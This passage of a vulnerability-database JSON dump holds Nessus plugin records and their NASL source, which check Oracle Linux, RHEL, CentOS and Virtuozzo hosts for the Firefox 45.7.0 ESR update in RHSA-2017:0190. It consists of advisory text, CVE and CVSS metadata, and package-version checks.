CVE-2017-5383,\nCVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Jann Horn, Filipe Gomes, Muneaki\nNishimura, Nils, Armin Razmjou, Christian Holler, Gary Kwong, Andre\nBargull, Jan de Mooij, Tom Schuster, Oriol, Rh0, Nicolas Gregoire, and\nJerri Rice as the original reporters.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-January/006685.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-January/006686.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-January/006687.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"firefox-45.7.0-1.0.1.el5_11\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"firefox-45.7.0-1.0.1.el6_8\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"firefox-45.7.0-1.0.1.el7_3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:29:13", "bulletinFamily": "scanner", "description": "An update for firefox is now available for Red Hat Enterprise Linux 5, Red Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\n[Updated 21 February 2017] This advisory has been updated to include Firefox packages for the PPC and S390 architectures that were previously omitted. For this revised update, packages for all architectures were rebuilt. The rebuilt packages do not contain any new code changes.\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.7.0 ESR.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378, CVE-2017-5380, CVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Jann Horn, Filipe Gomes, Muneaki Nishimura, Nils, Armin Razmjou, Christian Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom Schuster, Oriol, Rh0, Nicolas Gregoire, and Jerri Rice as the original reporters.", "modified": "2018-12-27T00:00:00", "id": "REDHAT-RHSA-2017-0190.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96791", "published": "2017-01-26T00:00:00", "title": "RHEL 5 / 6 / 7 : firefox (RHSA-2017:0190)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0190. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96791);\n script_version(\"3.12\");\n script_cvs_date(\"Date: 2018/12/27 10:05:37\");\n\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\", \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\", \"CVE-2017-5396\");\n script_xref(name:\"RHSA\", value:\"2017:0190\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : firefox (RHSA-2017:0190)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for firefox is now available for Red Hat Enterprise Linux 5,\nRed Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\n[Updated 21 February 2017] This advisory has been updated to include\nFirefox packages for the PPC and S390 architectures that were\npreviously omitted. For this revised update, packages for all\narchitectures were rebuilt. The rebuilt packages do not contain any\nnew code changes.\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.7.0 ESR.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web\ncontent. A web page containing malicious content could cause Firefox\nto crash or, potentially, execute arbitrary code with the privileges\nof the user running Firefox. (CVE-2017-5373, CVE-2017-5375,\nCVE-2017-5376, CVE-2017-5378, CVE-2017-5380, CVE-2017-5383,\nCVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Jann Horn, Filipe Gomes, Muneaki\nNishimura, Nils, Armin Razmjou, Christian Holler, Gary Kwong, Andre\nBargull, Jan de Mooij, Tom Schuster, Oriol, Rh0, Nicolas Gregoire, and\nJerri Rice as the original reporters.\"\n );\n # https://www.mozilla.org/en-US/security/known-vulnerabilities/firefox-esr/#\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8b5eaff4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5378\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5386\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5383\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5373\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5375\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5376\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-5390\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox and / or firefox-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0190\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"firefox-45.7.0-2.el5_11\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"firefox-debuginfo-45.7.0-2.el5_11\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"firefox-45.7.0-2.el6_8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"firefox-debuginfo-45.7.0-2.el6_8\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", reference:\"firefox-45.7.0-2.el7_3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"firefox-debuginfo-45.7.0-2.el7_3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:29:15", "bulletinFamily": "scanner", "description": "An update for firefox is now available for Red Hat Enterprise Linux 5, Red Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\n[Updated 21 February 2017] This advisory has been updated to include Firefox packages for the PPC and S390 architectures that were previously omitted. For this revised update, packages for all architectures were rebuilt. The rebuilt packages do not contain any new code changes.\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.7.0 ESR.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378, CVE-2017-5380, CVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Jann Horn, Filipe Gomes, Muneaki Nishimura, Nils, Armin Razmjou, Christian Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom Schuster, Oriol, Rh0, Nicolas Gregoire, and Jerri Rice as the original reporters.", "modified": "2018-11-10T00:00:00", "id": "CENTOS_RHSA-2017-0190.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96813", "published": "2017-01-27T00:00:00", "title": "CentOS 5 / 6 / 7 : firefox (CESA-2017:0190)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0190 and \n# CentOS Errata and Security Advisory 2017:0190 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96813);\n script_version(\"3.14\");\n script_cvs_date(\"Date: 2018/11/10 11:49:32\");\n\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\", \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\", \"CVE-2017-5396\");\n script_xref(name:\"RHSA\", value:\"2017:0190\");\n\n script_name(english:\"CentOS 5 / 6 / 7 : firefox (CESA-2017:0190)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for firefox is now available for Red Hat Enterprise Linux 5,\nRed Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\n[Updated 21 February 2017] This advisory has been updated to include\nFirefox packages for the PPC and S390 architectures that were\npreviously omitted. For this revised update, packages for all\narchitectures were rebuilt. The rebuilt packages do not contain any\nnew code changes.\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.7.0 ESR.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web\ncontent. A web page containing malicious content could cause Firefox\nto crash or, potentially, execute arbitrary code with the privileges\nof the user running Firefox. (CVE-2017-5373, CVE-2017-5375,\nCVE-2017-5376, CVE-2017-5378, CVE-2017-5380, CVE-2017-5383,\nCVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Jann Horn, Filipe Gomes, Muneaki\nNishimura, Nils, Armin Razmjou, Christian Holler, Gary Kwong, Andre\nBargull, Jan de Mooij, Tom Schuster, Oriol, Rh0, Nicolas Gregoire, and\nJerri Rice as the original reporters.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-February/022276.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bf8b1fcc\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-February/022277.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7ad8a178\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-February/022278.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6f4242d2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"firefox-45.7.0-2.el5.centos\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"firefox-45.7.0-2.el6.centos\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"firefox-45.7.0-2.el7.centos\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:31:42", "bulletinFamily": "scanner", "description": "An update for firefox is now available for Red Hat Enterprise Linux 5, Red Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\n[Updated 21 February 2017] This advisory has been updated to include Firefox packages for the PPC and S390 architectures that were previously omitted. For this revised update, packages for all architectures were rebuilt. The rebuilt packages do not contain any new code changes.\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.7.0 ESR.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378, CVE-2017-5380, CVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Jann Horn, Filipe Gomes, Muneaki Nishimura, Nils, Armin Razmjou, Christian Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom Schuster, Oriol, Rh0, Nicolas Gregoire, and Jerri Rice as the original reporters.\n\nNote that Tenable Network Security has attempted to extract the preceding description block directly from the corresponding Red Hat security advisory. Virtuozzo provides no description for VZLSA advisories. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-02-05T00:00:00", "id": "VIRTUOZZO_VZLSA-2017-0190.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=101416", "published": "2017-07-13T00:00:00", "title": "Virtuozzo 6 : firefox (VZLSA-2017-0190)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101416);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/02/05 9:41:41\");\n\n script_cve_id(\n \"CVE-2017-5373\",\n \"CVE-2017-5375\",\n \"CVE-2017-5376\",\n \"CVE-2017-5378\",\n \"CVE-2017-5380\",\n \"CVE-2017-5383\",\n \"CVE-2017-5386\",\n \"CVE-2017-5390\",\n \"CVE-2017-5396\"\n );\n\n script_name(english:\"Virtuozzo 6 : firefox (VZLSA-2017-0190)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for firefox is now available for Red Hat Enterprise Linux 5,\nRed Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\n[Updated 21 February 2017] This advisory has been updated to include\nFirefox packages for the PPC and S390 architectures that were\npreviously omitted. For this revised update, packages for all\narchitectures were rebuilt. The rebuilt packages do not contain any\nnew code changes.\n\nMozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.7.0 ESR.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web\ncontent. A web page containing malicious content could cause Firefox\nto crash or, potentially, execute arbitrary code with the privileges\nof the user running Firefox. (CVE-2017-5373, CVE-2017-5375,\nCVE-2017-5376, CVE-2017-5378, CVE-2017-5380, CVE-2017-5383,\nCVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Jann Horn, Filipe Gomes, Muneaki\nNishimura, Nils, Armin Razmjou, Christian Holler, Gary Kwong, Andre\nBargull, Jan de Mooij, Tom Schuster, Oriol, Rh0, Nicolas Gregoire, and\nJerri Rice as the original reporters.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-0190.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?302e65da\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-0190\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected firefox package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:X\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 6.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"firefox-45.7.0-2.vl6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-6\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 